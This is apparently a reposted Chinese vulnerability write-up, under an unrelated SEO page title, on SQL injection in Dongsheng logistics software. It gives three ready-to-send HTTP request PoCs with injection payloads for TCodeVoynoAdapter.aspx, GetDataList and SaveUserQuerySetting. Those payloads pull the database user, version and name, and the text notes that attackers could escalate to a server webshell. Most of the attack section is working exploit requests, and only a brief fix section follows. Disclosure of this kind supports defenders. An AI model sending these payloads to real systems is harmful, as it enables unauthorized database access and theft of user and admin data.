当前位置：首页 > news >正文

网站空间如何买8718企业服务平台

news 2025/11/14 17:18:27

网站空间如何买,8718企业服务平台,重庆新闻频道直播在线观看,wordpress怎样修改主题模版0x01 产品简介东胜物流软件是一款致力于为客户提供IT支撑的 SOP#xff0c; 帮助客户大幅提高工作效率#xff0c;降低各个环节潜在风险的物流软件。 0x02 漏洞概述东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…0x01 产品简介东胜物流软件是一款致力于为客户提供IT支撑的 SOP 帮助客户大幅提高工作效率降低各个环节潜在风险的物流软件。 0x02 漏洞概述东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。 0x03 复现环境微步资产测绘app东胜物流软件 0x04 漏洞复现 PoC-1 GET /FeeCodes/TCodeVoynoAdapter.aspx?mask0pos0strVESSEL1%27anduser%3E0%3B-- HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 查询当前用户 PoC-2 GET /TruckMng/MsWlDriver/GetDataList?_dc1665626804091start0limit30sortcondition123IN(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20page1 HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip 查询数据库版本 PoC-3 POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencoded; charsetUTF-8 Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formnameMsRptSaleBalProfitShareIndexAND2523IN(SELECT(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECTSUBSTRING((ISNULL(CAST((db_name%28%29)ASNVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))ANDuKco%3duKcoisvisibletrueissavevaluetruequerydetail%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D} 查询当前数据库 0x05 修复建议官方暂未修复该漏洞请用户联系厂商修复漏洞http://www.dongshengsoft.com/ 部署Web应用防火墙对数据库操作进行监控。如非必要禁止公网访问该系统。

查看全文

http://www.zqtcl.cn/news/521692/